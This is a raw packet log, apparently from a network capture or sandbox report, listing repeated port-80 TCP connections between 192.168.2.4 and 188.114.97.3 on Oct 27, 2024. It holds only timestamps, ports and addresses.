                                                                                                                  Oct 27, 2024 19:23:29.899183989 CET4995480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.902301073 CET4995480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:29.907594919 CET8049954188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:30.264959097 CET4995480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:30.271051884 CET8049954188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:30.500969887 CET8049954188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:30.664804935 CET4995480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:30.802417040 CET8049954188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:30.868040085 CET4995480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:30.928071976 CET4995480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:30.928796053 CET4996180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:30.933737040 CET8049954188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:30.934056044 CET8049961188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:30.934107065 CET4995480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:30.934117079 CET4996180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:30.935734987 CET4996180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:30.940984011 CET8049961188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:31.290782928 CET4996180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:31.296233892 CET8049961188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:31.529575109 CET8049961188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:31.664778948 CET4996180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:31.729537964 CET8049961188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:31.848496914 CET4996180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:31.849066019 CET4996780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:31.854422092 CET8049961188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:31.854434013 CET8049967188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:31.854481936 CET4996180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:31.854515076 CET4996780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:31.854618073 CET4996780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:31.859893084 CET8049967188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:32.211734056 CET4996780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:32.217272997 CET8049967188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:32.473299980 CET8049967188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:32.491471052 CET4997080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:32.497014999 CET8049970188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:32.497078896 CET4997080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:32.497273922 CET4997080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:32.502603054 CET8049970188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:32.624562025 CET4996780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:32.771877050 CET8049967188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:32.771898031 CET8049967188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:32.771970034 CET4996780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:32.852332115 CET4997080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:32.857831955 CET8049970188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:32.857852936 CET8049970188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:32.897128105 CET4996780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:32.897680044 CET4997480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:32.902981043 CET8049967188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:32.903016090 CET8049974188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:32.903064013 CET4996780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:32.903096914 CET4997480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:32.903196096 CET4997480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:32.908457041 CET8049974188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:33.110871077 CET8049970188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:33.164771080 CET4997080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:33.258712053 CET4997480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:33.264328003 CET8049974188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:33.442723989 CET8049970188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:33.492893934 CET4997080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:33.497855902 CET8049974188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:33.650760889 CET4997480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:33.700144053 CET8049974188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:33.758568048 CET4997480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:33.843266964 CET4997080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:33.843352079 CET4997480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:33.844135046 CET4998080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:33.849023104 CET8049970188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:33.849389076 CET8049974188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:33.849409103 CET8049980188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:33.849446058 CET4997080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:33.849467993 CET4997480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:33.849498987 CET4998080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:33.851488113 CET4998080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:33.856744051 CET8049980188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:34.196213961 CET4998080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:34.202486038 CET8049980188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:34.468152046 CET8049980188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:34.508526087 CET4998080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:34.683489084 CET8049980188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:34.727279902 CET4998080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:34.803121090 CET4998080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:34.803760052 CET4998680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:34.808950901 CET8049980188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:34.809137106 CET8049986188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:34.809215069 CET4998080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:34.809259892 CET4998680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:34.809389114 CET4998680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:34.814635992 CET8049986188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:35.164880991 CET4998680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:35.170408010 CET8049986188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:35.406498909 CET8049986188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:35.461674929 CET4998680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:35.980652094 CET8049986188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:35.980669022 CET8049986188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:35.980737925 CET4998680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:35.980925083 CET4998680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:35.982347965 CET8049986188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:35.982424021 CET4998680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:35.986629963 CET8049986188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:35.986685038 CET4998680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:36.129745960 CET4999480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:36.135040045 CET8049994188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:36.135118008 CET4999480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:36.135216951 CET4999480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:36.140435934 CET8049994188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:36.493133068 CET4999480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:36.499010086 CET8049994188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:36.755479097 CET8049994188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:36.805432081 CET4999480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:36.963280916 CET8049994188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:37.008546114 CET4999480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:37.082250118 CET4999480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:37.082479000 CET4999980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:37.087840080 CET8049999188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:37.087918043 CET4999980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:37.088004112 CET4999980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:37.088193893 CET8049994188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:37.088255882 CET4999480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:37.093405962 CET8049999188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:37.446393013 CET4999980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:37.451858997 CET8049999188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:37.697647095 CET8049999188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:37.742914915 CET4999980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:37.965328932 CET8049999188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:37.965369940 CET8049999188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:37.965408087 CET4999980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:38.083556890 CET4999980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:38.083787918 CET5000880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:38.089118958 CET8050008188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:38.089190006 CET5000880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:38.089234114 CET8049999188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:38.089286089 CET5000880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:38.089302063 CET4999980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:38.094631910 CET8050008188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:38.446259975 CET5000880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:38.447516918 CET5000980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:38.447727919 CET5000880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:38.451721907 CET8050008188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:38.453090906 CET8050009188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:38.453175068 CET5000980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:38.483093977 CET5000980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:38.488451004 CET8050009188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:38.498421907 CET8050008188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:38.575129032 CET8050008188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:38.575181007 CET5000880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:38.632915020 CET5001080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:38.638237000 CET8050010188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:38.638386965 CET5001080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:38.642837048 CET5001080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:38.648204088 CET8050010188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:38.839912891 CET5000980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:38.845237970 CET8050009188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:38.845453024 CET8050009188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:38.993130922 CET5001080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:39.001784086 CET8050010188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:39.057583094 CET8050009188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:39.102308035 CET5000980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:39.243845940 CET8050010188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:39.289781094 CET5001080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:39.363708019 CET8050009188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:39.416203022 CET5000980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:39.548991919 CET8050010188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:39.549011946 CET8050010188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:39.549072027 CET5001080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:39.691210032 CET5000980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:39.691286087 CET5001080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:39.692146063 CET5001780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:39.697304010 CET8050009188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:39.697398901 CET8050010188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:39.697448969 CET8050017188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:39.697480917 CET5000980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:39.697487116 CET5001080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:39.697542906 CET5001780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:39.697731972 CET5001780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:39.702976942 CET8050017188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:40.055757999 CET5001780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:40.061222076 CET8050017188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:40.302079916 CET8050017188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:40.352406025 CET5001780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:40.598712921 CET8050017188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:40.649199009 CET5001780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:40.807996988 CET5001780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:40.808901072 CET5002380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:40.814122915 CET8050017188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:40.814191103 CET5001780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:40.814284086 CET8050023188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:40.814368963 CET5002380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:40.815393925 CET5002380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:40.820697069 CET8050023188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:41.165080070 CET5002380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:41.170649052 CET8050023188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:41.427539110 CET8050023188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:41.477333069 CET5002380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:41.639210939 CET8050023188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:41.639252901 CET8050023188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:41.639336109 CET5002380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:41.763364077 CET5002380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:41.764226913 CET5003280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:41.769315004 CET8050023188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:41.769397974 CET5002380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:41.769648075 CET8050032188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:41.769742012 CET5003280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:41.769871950 CET5003280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:41.775217056 CET8050032188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:42.173346043 CET5003280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:42.178828001 CET8050032188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:42.372852087 CET8050032188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:42.414829016 CET5003280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:42.591228962 CET8050032188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:42.633590937 CET5003280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:42.928045988 CET5003280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:42.928680897 CET5003980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:42.933871984 CET8050032188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:42.933942080 CET5003280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:42.934058905 CET8050039188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:42.934144974 CET5003980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:42.934261084 CET5003980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:42.939611912 CET8050039188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:43.289904118 CET5003980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:43.295526028 CET8050039188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:43.535711050 CET8050039188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:43.586669922 CET5003980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:43.839453936 CET8050039188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:43.883555889 CET5003980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:43.976687908 CET5003980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:43.977838993 CET5004580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:43.982817888 CET8050039188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:43.983225107 CET8050045188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:43.983304977 CET5003980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:43.983334064 CET5004580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:43.983424902 CET5004580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:43.990870953 CET8050045188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:44.336946964 CET5004580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:44.344932079 CET8050045188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:44.394589901 CET5004680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:44.400219917 CET8050046188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:44.401137114 CET5004680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:44.401252985 CET5004680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:44.409457922 CET8050046188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:44.585088968 CET8050045188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:44.633555889 CET5004580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:44.758749962 CET5004680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:44.766751051 CET8050046188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:44.766885042 CET8050046188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:44.783058882 CET8050045188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:44.836818933 CET5004580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.000314951 CET8050046188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:45.039820910 CET5004680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.224514961 CET8050046188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:45.274307966 CET5004680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.628740072 CET5004580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.628819942 CET5004680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.634285927 CET5005680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.634468079 CET8050045188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:45.634515047 CET5004580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.634747028 CET8050046188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:45.634829998 CET5004680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.639731884 CET8050056188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:45.639895916 CET5005680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.639895916 CET5005680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.645308018 CET8050056188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:45.993535995 CET5005680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:45.998936892 CET8050056188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:46.250893116 CET8050056188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:46.305447102 CET5005680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:46.571002960 CET8050056188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:46.617957115 CET5005680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:46.699757099 CET5005680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:46.700567007 CET5006280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:46.705634117 CET8050056188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:46.705712080 CET5005680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:46.706017017 CET8050062188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:46.706103086 CET5006280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:46.706269979 CET5006280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:46.711903095 CET8050062188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:47.055536985 CET5006280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:47.061214924 CET8050062188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:47.316524982 CET8050062188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:47.367938995 CET5006280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:47.515790939 CET8050062188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:47.516052961 CET8050062188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:47.516154051 CET5006280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:47.657835960 CET5006280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:47.664112091 CET8050062188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:47.664177895 CET5006280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:47.666400909 CET5006880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:47.671870947 CET8050068188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:47.671956062 CET5006880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:47.673482895 CET5006880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:47.679069996 CET8050068188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:48.024363995 CET5006880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:48.029889107 CET8050068188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:48.276401997 CET8050068188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:48.321063042 CET5006880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:48.475914001 CET8050068188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:48.524348021 CET5006880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:48.684464931 CET5006880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:48.690452099 CET8050068188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:48.690524101 CET5006880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:48.691533089 CET5007580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:48.697101116 CET8050075188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:48.697181940 CET5007580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:48.699973106 CET5007580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:48.705390930 CET8050075188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:49.055764914 CET5007580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:49.062383890 CET8050075188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:49.295866966 CET8050075188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:49.493042946 CET5007580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:49.495891094 CET8050075188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:49.495975971 CET8050075188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:23:49.496026039 CET5007580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:23:49.625992060 CET5007580192.168.2.4188.114.97.3
